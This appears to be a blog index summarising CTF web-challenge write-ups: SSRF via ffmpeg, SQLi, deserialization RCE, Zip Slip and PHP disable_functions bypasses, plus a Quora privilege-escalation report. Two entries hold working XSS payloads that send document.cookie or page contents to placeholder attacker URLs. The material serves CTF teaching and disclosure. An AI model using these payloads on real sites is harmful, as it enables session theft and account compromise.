tl;dr

• Part-1: .bzr file retrival using any tool
• Part-1: exploiting ssrf via ffmpeg to read /flag file to a video and download it before it gets deleted

tl;dr

• Payload: a<math>b<xss style=display:block>c<style>d<a title="</style>"><img src onerror=document.location='https://your_url/?'.concat(document.cookie)>">e

tl;dr

• SQLi - lcase('inKypinKy')id from dual
• Creating User - header("location:http://web/user.php?session=1111-22222-1234&sub=submit");
• Retrieving Flag - header("location:http://web/flag.php?session=<iframe id="a" src="http://web/flag.php?session=1111-22222-1234&sub=submit" onload=window.location="<URL>?"+btoa(document.getElementById('a').contentWindow.document.body.innerText)>&sub=submit")

tl;dr

• Extract key from the admin by STARTTLS downgrade on the message
• Deserialize using references to get next phase
• Deserialization to RCE to get flag

tl;dr

• Accessing a variable in Handlebars template using this object

tl;dr

• Zip Slip Vulnerability + YAML Deserialization Attack + Race Condition
• Unintended Solution: Upload symlink leading to arbitarary file reads

In this blog, we will be discussing the new functions we got to bypass PHP disable_functions and also the other tricks to do the same.

Write-up of Eval Me challenge from BSides Delhi CTF 2019

tl;dr Bypassing disable_functions using PHP-Imagick and Soffice

Hey, I am SpyD3r(TarunkantG) and In this blog I will be discussing all the 5 web challenges that I made for InCTFi 2019 and a lot of SQLi and bypassing disable_functions tricks.

Hey, I am SpyD3r(@TarunkantG) and in this blog, I will be discussing the critical bug I have found in Quora which can compromise all users on Quora due to Horizontal Privilege Escalation.